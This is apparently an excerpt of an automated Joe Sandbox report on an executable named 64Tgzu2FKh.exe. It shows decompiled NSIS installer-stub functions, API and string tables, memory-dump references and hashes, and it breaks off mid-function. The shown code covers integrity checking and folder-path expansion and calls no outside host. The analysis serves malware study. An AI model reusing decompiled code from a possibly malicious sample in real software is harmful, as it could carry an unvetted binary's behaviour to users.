0x00403bb2
0x00403bbb
0x00403bbe
0x00403bc4
0x00403bc4
0x00403be3
0x00403bf4
0x00000000
0x00403bf9
0x00403b61
0x00403b63
0x00000000
0x00403ad8
0x00403ad8
0x00403ae4
0x00403aee
0x00403af4
0x00403af9
0x00403b08
0x00403c26
0x00403c26
0x00000000
0x00403c26
0x00403b17
0x00403b52
0x00000000
0x00403b52
0x00403a0f
0x00403a0f
0x00403a12
0x00403a14
0x00000000
0x00000000
0x00403a22
0x00403a34
0x00403a39
0x00403a42
0x00000000
0x00000000
0x00403a48
0x00403a4a
0x00403a57
0x00403a57
0x00403a60
0x00403a66
0x00403a8e
0x00403a96
0x00000000
0x00403a78
0x00403a79
0x00403a82
0x00403a88
0x00403a89
0x00000000
0x00403a89
0x00403a84
0x00403a86
0x00000000
0x00000000
0x00000000
0x00403a86
0x00403a66

APIs

Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653

lstrcatW.KERNEL32(1033,004236E8), ref: 004039DB
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
GetFileAttributesW.KERNEL32(Call), ref: 00403A79
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth), ref: 00403AC2

Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0

RegisterClassW.USER32(004291A0), ref: 00403AFF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
ShowWindow.USER32(00000005,00000000), ref: 00403B82
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
RegisterClassW.USER32(004291A0), ref: 00403BC4
DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3

Strings

Call, xrefs: 00403A22, 00403A2B, 00403A39, 00403A88, 00403A8E
RichEdit, xrefs: 00403BB5
Control Panel\Desktop\ResourceLocale, xrefs: 0040398E
6B, xrefs: 00403986
.DEFAULT\Control Panel\International, xrefs: 004039C6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 004039EA, 004039F2, 00403A95, 00403A9B, 00403AAB
.exe, xrefs: 00403A68
1033, xrefs: 0040397A, 004039D6
RichEd32, xrefs: 00403B96
_Nb, xrefs: 00403ADE, 00403B46
C:\Users\user\AppData\Local\Temp\, xrefs: 00403966
RichEd20, xrefs: 00403B88
RichEdit20W, xrefs: 00403BA6, 00403BAC
"C:\Users\user\Desktop\64Tgzu2FKh.exe", xrefs: 0040395E

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\64Tgzu2FKh.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-2501240543
Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\64Tgzu2FKh.exe";
				 *0x42a210 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\64Tgzu2FKh.exe", 0x400);
				_t89 = E00405D3E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040624C(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040624C(0x439000, E00405B69(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x418ea4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x42a218 - _t82;
					if( *0x42a218 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004032F5( *0x42a218 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a214 = _t94;
							 *0x42a21c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a220 =  *0x42a220 + 1;
								__eflags =  *0x42a220;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405CF9(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004032F5( *0x40ce98);
					_t65 = E004032DF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a218) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032DF(0x418ea8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a218;
						if( *0x42a218 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405CF9( &_v44, 0x418ea8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40ce98; // 0x54265
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a218 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x418ea4; // 0x54269
						if(__eflags < 0) {
							_v12 = E00406719(_v12, 0x418ea8, _t90);
						}
						 *0x40ce98 =  *0x40ce98 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ec9
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed8
0x00402ee9
0x00402eee
0x00402f01
0x00402f06
0x00402f09
0x00402f0f
0x00000000
0x00402f11
0x00402f1c
0x00402f22
0x00402f33
0x00402f3a
0x00402f40
0x00402f42
0x00402f47
0x00402f49
0x00403036
0x00403038
0x0040303d
0x00403044
0x00000000
0x00000000
0x00403046
0x00403049
0x0040306d
0x00403072
0x00403078
0x00403083
0x00403088
0x0040308b
0x0040308c
0x0040308d
0x0040308f
0x00403094
0x00403097
0x004030aa
0x004030ae
0x004030b6
0x004030bb
0x004030bd
0x004030bd
0x004030bd
0x004030c5
0x004030c5
0x004030c8
0x004030c9
0x004030c9
0x004030cc
0x004030ce
0x004030ce
0x004030ce
0x004030d8
0x004030de
0x004030ec
0x004030f1
0x00000000
0x004030f1
0x00000000
0x00403097
0x00403051
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00403068
0x0040306b
0x00000000
0x00000000
0x00000000
0x00402f4f
0x00402f54
0x00402f59
0x00402f5d
0x00402f64
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6d
0x00402f71
0x00402f76
0x00402f78
0x004030a2
0x00403099
0x00000000
0x00403099
0x00402f7e
0x00402f85
0x00403001
0x00403005
0x00403009
0x0040300e
0x00000000
0x00403005
0x00402f8e
0x00402f93
0x00402f96
0x00402f9b
0x00000000
0x00000000
0x00402f9d
0x00402fa4
0x00000000
0x00000000
0x00402fa6
0x00402fad
0x00000000
0x00000000
0x00402faf
0x00402fb6
0x00000000
0x00000000
0x00402fb8
0x00402fbf
0x00000000
0x00000000
0x00402fc1
0x00402fc7
0x00402fd0
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fe1
0x00000000
0x00000000
0x00402fe7
0x00402feb
0x00402ff3
0x00402ff3
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffd
0x00402ffd
0x00000000
0x00402ffb
0x00402fed
0x00402ff1
0x00000000
0x00000000
0x00000000
0x0040300f
0x0040300f
0x00403015
0x00403021
0x00403021
0x00403024
0x0040302a
0x0040302c
0x0040302c
0x00403034
0x00403034
0x00000000
0x00403034

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\64Tgzu2FKh.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\64Tgzu2FKh.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\64Tgzu2FKh.exe,C:\Users\user\Desktop\64Tgzu2FKh.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
soft, xrefs: 00402FAF
Inst, xrefs: 00402FA6
Error launching installer, xrefs: 00402F11
Null, xrefs: 00402FB8
C:\Users\user\Desktop\64Tgzu2FKh.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
"C:\Users\user\Desktop\64Tgzu2FKh.exe", xrefs: 00402EC1

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\64Tgzu2FKh.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\64Tgzu2FKh.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-2413163602
Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0040626E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x4291dc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a258 + _t43 * 2;
				_t44 = 0x4281a0;
				_t110 = 0x4281a0;
				if(_a4 >= 0x4281a0 && _a4 - 0x4281a0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E0040626E(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4281a0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040624C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406193(_t110,  *0x42a208);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064E0(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a20c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a2a4;
						if( *0x42a2a4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a204;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a208,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a208,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040611A( *0x42a258, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E0040626E(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040624C(_a4, _t44);
			}

0x0040626e
0x0040626e
0x0040626e
0x00406274
0x00406279
0x0040628a
0x0040628a
0x00406292
0x00406293
0x00406294
0x00406295
0x00406298
0x004062a0
0x004062a2
0x004062bb
0x004062be
0x004062be
0x004064ba
0x004064ba
0x004064c0
0x00000000
0x00000000
0x004062ce
0x004062d4
0x00000000
0x00000000
0x004062dc
0x004062dd
0x004062df
0x004062e3
0x004062e6
0x004064a7
0x004064b5
0x004064b8
0x004064b8
0x004064a9
0x004064ac
0x004064af
0x004064b1
0x004064b1
0x00000000
0x004064a7
0x004062ec
0x004062ef
0x004062fe
0x00406305
0x0040630f
0x00406313
0x00406316
0x00406319
0x0040631e
0x00406323
0x00406327
0x0040632a
0x0040644a
0x0040644e
0x00406481
0x00406485
0x0040648a
0x0040648f
0x0040648f
0x00406494
0x00406495
0x0040649a
0x0040649d
0x004064a0
0x00000000
0x004064a0
0x00406450
0x00406453
0x00406456
0x0040646b
0x00406472
0x00406458
0x0040645f
0x0040645f
0x0040647a
0x0040647d
0x00406442
0x00406443
0x00406443
0x00000000
0x0040647d
0x00406330
0x00406338
0x0040633a
0x0040633b
0x00406354
0x00406354
0x0040635b
0x0040635b
0x00406362
0x00406366
0x00406366
0x00406367
0x00406369
0x004063a4
0x004063a7
0x004063b7
0x004063ba
0x004063c2
0x004063c8
0x004063c8
0x00406425
0x00406425
0x00406427
0x00000000
0x00000000
0x004063cc
0x004063d3
0x004063d4
0x004063d6
0x004063f0
0x004063fe
0x00406404
0x00406406
0x00406421
0x00406421
0x00406421
0x00000000
0x00406421
0x0040640c
0x00406417
0x0040641d
0x0040641f
0x00000000
0x00000000
0x00000000
0x0040641f
0x004063d8
0x004063db
0x00000000
0x00000000
0x004063ea
0x004063ec
0x004063ee
0x00000000
0x00000000
0x00000000
0x004063ee
0x00000000
0x00406425
0x004063af
0x00000000
0x0040636b
0x00406389
0x0040638e
0x00406392
0x00406432
0x00406432
0x00406435
0x0040643d
0x0040643d
0x00000000
0x00406435
0x0040639a
0x00406429
0x00406429
0x0040642d
0x00000000
0x00000000
0x0040642f
0x00000000
0x0040642f
0x00406369
0x0040633d
0x00406342
0x00000000
0x00000000
0x00406344
0x00406347
0x00000000
0x00000000
0x00406349
0x0040634c
0x00000000
0x0040634e
0x0040634e
0x00000000
0x0040634e
0x0040634c
0x004064c6
0x004064d1
0x004064dd
0x004064dd
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063AF
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,?,004052E7,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000), ref: 004063C2
SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,?,004052E7,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000), ref: 004063FE
SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 0040640C
CoTaskMemFree.OLE32(00410EA0), ref: 00406417
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,?,004052E7,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000), ref: 00406495

Strings

Call, xrefs: 00406298, 00406373, 0040637A, 0040637E, 00406398, 00406399, 004063AE, 004063C1, 004063DD, 00406408, 0040643C, 00406442, 0040645E, 00406471, 0040648E, 00406494, 004064A0, 004064D3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040637F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406437
Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll, xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1723403758
Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
